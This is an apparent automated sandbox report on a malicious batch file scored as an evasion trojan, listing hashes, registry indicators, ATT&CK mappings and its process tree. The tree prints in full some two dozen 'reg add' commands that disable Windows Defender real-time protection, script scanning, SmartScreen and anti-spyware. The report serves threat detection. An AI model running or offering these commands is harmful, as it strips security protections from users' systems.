13101216127da473cec5dda480c23c4db57e1f1a9d25f46c7595818c30cf1f52

Analysis

max time kernel
94s
max time network
142s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
04/12/2024, 13:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

$_63_/bnoo1.bat
Size

2KB
MD5

1f89930c9e4fd56765ca2ac17e06817d
SHA1

cecb1c4a81dc27a6f4379ead464f418a1bf10ce9
SHA256

2de693852c2127d52fe758bde2fa606d3adf5f4eb790f186797abc48e3e892e7
SHA512

488f77ba07c40a27c3f76636fba2479146ce6aa0b6a4948677e4cc5a2937eae42f2b15c2bbf13ebb95cf3e2bd0ace5fa525072cb2bcd368571f8fe79eb6fcd1c

Score

10^/10

evasion trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 14 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRoutinelyTakingAction = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScriptScanning = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe

Suspicious use of WriteProcessMemory 46 IoCs

description	pid	Process	procid_target
PID 5004 wrote to memory of 3556	5004	cmd.exe	84
PID 5004 wrote to memory of 3556	5004	cmd.exe	84
PID 5004 wrote to memory of 4508	5004	cmd.exe	85
PID 5004 wrote to memory of 4508	5004	cmd.exe	85
PID 5004 wrote to memory of 2972	5004	cmd.exe	86
PID 5004 wrote to memory of 2972	5004	cmd.exe	86
PID 5004 wrote to memory of 4612	5004	cmd.exe	87
PID 5004 wrote to memory of 4612	5004	cmd.exe	87
PID 5004 wrote to memory of 4368	5004	cmd.exe	88
PID 5004 wrote to memory of 4368	5004	cmd.exe	88
PID 5004 wrote to memory of 1504	5004	cmd.exe	89
PID 5004 wrote to memory of 1504	5004	cmd.exe	89
PID 5004 wrote to memory of 4932	5004	cmd.exe	90
PID 5004 wrote to memory of 4932	5004	cmd.exe	90
PID 5004 wrote to memory of 4192	5004	cmd.exe	91
PID 5004 wrote to memory of 4192	5004	cmd.exe	91
PID 5004 wrote to memory of 3716	5004	cmd.exe	92
PID 5004 wrote to memory of 3716	5004	cmd.exe	92
PID 5004 wrote to memory of 4940	5004	cmd.exe	93
PID 5004 wrote to memory of 4940	5004	cmd.exe	93
PID 5004 wrote to memory of 4764	5004	cmd.exe	94
PID 5004 wrote to memory of 4764	5004	cmd.exe	94
PID 5004 wrote to memory of 2480	5004	cmd.exe	95
PID 5004 wrote to memory of 2480	5004	cmd.exe	95
PID 5004 wrote to memory of 4768	5004	cmd.exe	96
PID 5004 wrote to memory of 4768	5004	cmd.exe	96
PID 5004 wrote to memory of 1016	5004	cmd.exe	97
PID 5004 wrote to memory of 1016	5004	cmd.exe	97
PID 5004 wrote to memory of 848	5004	cmd.exe	98
PID 5004 wrote to memory of 848	5004	cmd.exe	98
PID 5004 wrote to memory of 1444	5004	cmd.exe	99
PID 5004 wrote to memory of 1444	5004	cmd.exe	99
PID 5004 wrote to memory of 2276	5004	cmd.exe	100
PID 5004 wrote to memory of 2276	5004	cmd.exe	100
PID 5004 wrote to memory of 324	5004	cmd.exe	101
PID 5004 wrote to memory of 324	5004	cmd.exe	101
PID 5004 wrote to memory of 1576	5004	cmd.exe	102
PID 5004 wrote to memory of 1576	5004	cmd.exe	102
PID 5004 wrote to memory of 1844	5004	cmd.exe	103
PID 5004 wrote to memory of 1844	5004	cmd.exe	103
PID 5004 wrote to memory of 3520	5004	cmd.exe	104
PID 5004 wrote to memory of 3520	5004	cmd.exe	104
PID 5004 wrote to memory of 836	5004	cmd.exe	105
PID 5004 wrote to memory of 836	5004	cmd.exe	105
PID 5004 wrote to memory of 1704	5004	cmd.exe	106
PID 5004 wrote to memory of 1704	5004	cmd.exe	106

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\$_63_\bnoo1.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:5004
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
  2⤵
  PID:3556
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f
  2⤵
  PID:4508
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
  2⤵
  PID:2972
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f
  2⤵
  PID:4612
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f
  2⤵
  PID:4368
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /f
  2⤵
  PID:1504
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f
  2⤵
  PID:4932
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f
  2⤵
  PID:4192
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f
  2⤵
  PID:3716
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f
  2⤵
  PID:4940
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t reg_DWORD /d "0" /f
  2⤵
  PID:4764
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f
  2⤵
  PID:2480
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "LocalSettingOverridePurgeItemsAfterDelay" /t reg_DWORD /d "0" /f
  2⤵
  PID:4768
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t reg_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:1016
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t reg_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:848
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t reg_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:1444
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t reg_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:2276
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t reg_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:324
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScriptScanning" /t reg_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:1576
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t reg_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:1844
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v "Scan_ScheduleDay" /t reg_DWORD /d "8" /f
  2⤵
  PID:3520
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v "Scan_ScheduleTime" /t reg_DWORD /d 0 /f
  2⤵
  PID:836
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "AdditionalActionTimeOut" /t reg_DWORD /d 0 /f
  2⤵
  PID:1704

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Windows 7 deprecation

Loading Replay Monitor...

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads